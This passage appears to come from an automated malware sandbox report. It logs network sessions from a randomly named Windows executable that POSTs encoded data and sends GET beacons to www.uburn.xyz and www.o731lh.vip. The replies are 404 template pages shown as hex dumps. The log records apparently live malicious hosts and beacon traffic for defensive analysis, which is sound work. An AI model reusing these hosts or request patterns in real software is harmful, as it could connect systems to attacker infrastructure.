                                                                                                                  Oct 8, 2024 15:38:23.947081089 CEST1236INData Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                                                                                                                  Oct 8, 2024 15:38:23.947089911 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 34 3c 2f 61 3e 0a
                                                                                                                  Data Ascii: <li><a class="dropdown-item dropdown-toggle" href="#">Header 4</a> <ul class="dropdown-menu"> <li><a class="drop
                                                                                                                  Oct 8, 2024 15:38:23.951884031 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 35 2d 64 61 72 6b 2e 68 74 6d 6c 22 3e
                                                                                                                  Data Ascii: <li><a class="dropdown-item" href="header5-dark.html">Header 5 Dark</a></li> </ul> </li>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  7192.168.2.54998267.223.117.189804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:25.930362940 CEST1749OUTPOST /iqqs/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.uburn.xyz
                                                                                                                  Origin: http://www.uburn.xyz
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Referer: http://www.uburn.xyz/iqqs/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 53 35 6e 4f 33 79 62 73 37 6d 73 36 54 36 68 73 63 39 2b 2f 34 38 77 71 70 4e 73 4b 50 54 32 6d 32 64 47 4a 2f 6e 73 51 54 79 44 57 4f 65 4b 72 30 43 4a 74 37 66 70 6f 4e 4d 68 57 2f 43 65 48 4d 7a 67 36 65 66 74 4b 46 66 66 4d 30 73 49 66 4c 32 2b 4d 79 78 53 77 33 5a 6a 34 68 67 6d 2f 43 71 53 46 41 34 6d 36 61 47 68 45 6e 47 6d 55 69 39 68 58 4c 31 43 74 6f 68 6e 64 2b 30 4f 50 4d 6c 59 74 4f 39 79 61 51 4c 6f 72 44 42 73 45 72 4e 55 65 55 34 43 67 53 48 33 6d 74 6f 78 50 69 57 71 39 32 31 6c 4d 65 4c 55 76 30 69 49 49 54 41 71 64 70 55 65 59 72 7a 4c 50 6d 73 78 78 51 4f 66 6c 6f 50 57 35 58 35 76 7a 4a 32 56 62 64 31 48 4c 2b 5a 7a 32 41 74 6c 33 70 36 77 61 76 6f 72 71 32 70 49 73 68 66 4b 36 55 70 53 53 4f 55 65 72 59 4e 62 4d 56 57 57 74 36 38 66 64 6c 64 50 2b 49 73 78 46 64 50 68 65 4f 5a 57 6f 6d 41 78 30 2b 76 65 68 65 51 2f 73 32 71 79 34 31 37 64 32 45 58 4f 69 4a 78 31 31 6e 53 35 66 52 50 79 53 66 31 42 6a 57 49 59 32 50 50 33 77 55 64 48 4a 55 56 43 7a 30 31 4e 55 59 77 70 [TRUNCATED]
                                                                                                                  Data Ascii: nV=S5nO3ybs7ms6T6hsc9+/48wqpNsKPT2m2dGJ/nsQTyDWOeKr0CJt7fpoNMhW/CeHMzg6eftKFffM0sIfL2+MyxSw3Zj4hgm/CqSFA4m6aGhEnGmUi9hXL1Ctohnd+0OPMlYtO9yaQLorDBsErNUeU4CgSH3mtoxPiWq921lMeLUv0iIITAqdpUeYrzLPmsxxQOfloPW5X5vzJ2Vbd1HL+Zz2Atl3p6wavorq2pIshfK6UpSSOUerYNbMVWWt68fdldP+IsxFdPheOZWomAx0+veheQ/s2qy417d2EXOiJx11nS5fRPySf1BjWIY2PP3wUdHJUVCz01NUYwpg/tn51VFSyVNn7wkqcFsLUeePIkGGTkmXVuQiQSO87paV56lCiEiKyjtUWQz2kWwNnhWoEiDjkt9wtXMxEjxKD6ICDpC05IXuo1mJAuH2IqMjQBHI+200syo0TuF9LW8w8tRcLFDFFjt4jBsqkuRgS5KQcJIuwe7FPjUN7vR/+lhO0OVN+Ku867D/vO/YMRlnOViw6ezziVcjLq3o13o0zKwFMK/iolqGPhUVR2Nl+qEP7gVRHn1qegBynGUlmGhXztUGf2yaTHhs+oOp7MUPWIFEtgj/Bl/KVNIR8seeTtJQSYrVhOqP07YiCTg0NyOKORY4RkyHpPDQAAWFp++Tg42IJKxffYPg0wrOVnwEpU49dZlBhbeVgiNxsj6bVEOOU4FJUO8pDiGhbnGaY2CHOiE2/FHpvNc6hUBz5VwrYmGfw5BRVYlQsN5W/RtaA7b5sfwHcq5/IYngxhkNX4r0nzSLF/L0XwtlxWi6ZYR2ZrPXDbVXz070/Sy+WwLomvXRBJBcHmqoxdYARr2voUJIUSulliek7uludiilRfemeeHwuDG9CT1GdAuVvQ20OHCxDXiyBvvABYDjIn1xq0yEniW6gk8U3lnPzdvmck4aimreoTkeFN+KJjkqr1566QFwHffxZfC5k6XYKv3PqRHifs3NnlHJioFWv [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:38:26.501810074 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:26 GMT
                                                                                                                  Server: Apache
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Content-Length: 32106
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:38:26.501868010 CEST1236INData Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                                                                                                  Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                                                                                                  Oct 8, 2024 15:38:26.501885891 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                                                                                                  Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                                                                                                  Oct 8, 2024 15:38:26.501909971 CEST1236INData Raw: 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/images/France.png"
                                                                                                                  Oct 8, 2024 15:38:26.501928091 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e 68 74 6d 6c 22 3e 3c 69 6d 67 20 73 72 63 3d
                                                                                                                  Data Ascii: <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" type="button" da
                                                                                                                  Oct 8, 2024 15:38:26.502152920 CEST1236INData Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                                                                                                  Oct 8, 2024 15:38:26.502182007 CEST1236INData Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                                                                                                  Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                                                                                                  Oct 8, 2024 15:38:26.502198935 CEST448INData Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                                                                                                                  Oct 8, 2024 15:38:26.502243042 CEST1236INData Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                                                                                                  Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                                                                                                  Oct 8, 2024 15:38:26.502258062 CEST224INData Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                                                                                                  Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                                                                                                                  Oct 8, 2024 15:38:26.506917000 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 5</a> <ul class="dropdown-menu">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  8192.168.2.54998367.223.117.189804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:28.472740889 CEST467OUTGET /iqqs/?nV=f7Pu0FXPylRYdptnYM+M274MvaQkI0mPgPaD0QQYagT1MtyUkVhu56FZSrYHt1j8AD8LTP1JVeTQ4dQlBUKb6i2E7evasg+rZKL8K5GvfkdXq3aEhfRhQBOeogOLhyWDdw==&ntHx=DVDDWR70P4Ux HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.uburn.xyz
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:38:29.065129995 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:28 GMT
                                                                                                                  Server: Apache
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Content-Length: 32106
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                                                                                                  Oct 8, 2024 15:38:29.065192938 CEST1236INData Raw: 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73
                                                                                                                  Data Ascii: strap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL
                                                                                                                  Oct 8, 2024 15:38:29.065254927 CEST1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e
                                                                                                                  Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="
                                                                                                                  Oct 8, 2024 15:38:29.065289974 CEST1236INData Raw: 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68
                                                                                                                  Data Ascii: mg src="assets/custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/ima
                                                                                                                  Oct 8, 2024 15:38:29.065440893 CEST1236INData Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e
                                                                                                                  Data Ascii: "> <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" t
                                                                                                                  Oct 8, 2024 15:38:29.065500975 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 6f 6d 65 32 2e 68 74 6d
                                                                                                                  Data Ascii: <li><a class="dropdown-item" href="home2.html">Home 2</a></li> <li><a class="dropdown-item" href="home3.html">Home 3</a></li>
                                                                                                                  Oct 8, 2024 15:38:29.065536976 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64
                                                                                                                  Data Ascii: <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li> <li><a class="dropdown-item" href="header1-light.
                                                                                                                  Oct 8, 2024 15:38:29.065566063 CEST108INData Raw: 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: /li> </ul>
                                                                                                                  Oct 8, 2024 15:38:29.065598965 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d
                                                                                                                  Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                                                                                                  Oct 8, 2024 15:38:29.065635920 CEST1236INData Raw: 61 64 65 72 20 34 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: ader 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                                                                                                                  Oct 8, 2024 15:38:29.070810080 CEST1236INData Raw: 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20
                                                                                                                  Data Ascii: rs</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  9192.168.2.5499843.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:42.277132988 CEST715OUTPOST /eruc/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.o731lh.vip
                                                                                                                  Origin: http://www.o731lh.vip
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.o731lh.vip/eruc/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 35 72 76 48 32 35 33 4d 2f 64 2b 61 75 72 41 6c 36 54 57 36 4f 43 34 61 2b 79 52 51 43 58 75 59 66 33 49 5a 71 41 32 51 31 35 4a 61 65 51 49 4a 62 63 56 70 2b 30 41 50 2b 6e 2b 5a 66 62 70 57 78 56 57 75 2b 76 56 52 52 69 59 6c 77 37 32 33 63 74 61 78 59 6e 6f 2f 54 6f 34 50 62 41 41 78 70 42 6d 31 6e 32 63 4f 34 38 78 71 46 66 78 54 6b 34 50 34 7a 63 32 71 57 46 63 67 64 52 36 57 44 77 79 62 51 34 59 75 55 70 51 6b 41 4b 64 68 64 42 79 61 36 39 52 2f 6c 52 4b 74 7a 34 68 4a 71 69 4a 4c 48 32 53 69 65 41 50 5a 68 6a 47 39 48 59 57 39 54 6e 4d 72 52 7a 65 4b 52 61 64 38 59 70 39 4b 56 45 59 3d
                                                                                                                  Data Ascii: nV=5rvH253M/d+aurAl6TW6OC4a+yRQCXuYf3IZqA2Q15JaeQIJbcVp+0AP+n+ZfbpWxVWu+vVRRiYlw723ctaxYno/To4PbAAxpBm1n2cO48xqFfxTk4P4zc2qWFcgdR6WDwybQ4YuUpQkAKdhdBya69R/lRKtz4hJqiJLH2SieAPZhjG9HYW9TnMrRzeKRad8Yp9KVEY=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  10192.168.2.5499853.33.130.190804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:44.820225954 CEST735OUTPOST /eruc/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.o731lh.vip
                                                                                                                  Origin: http://www.o731lh.vip
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.o731lh.vip/eruc/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
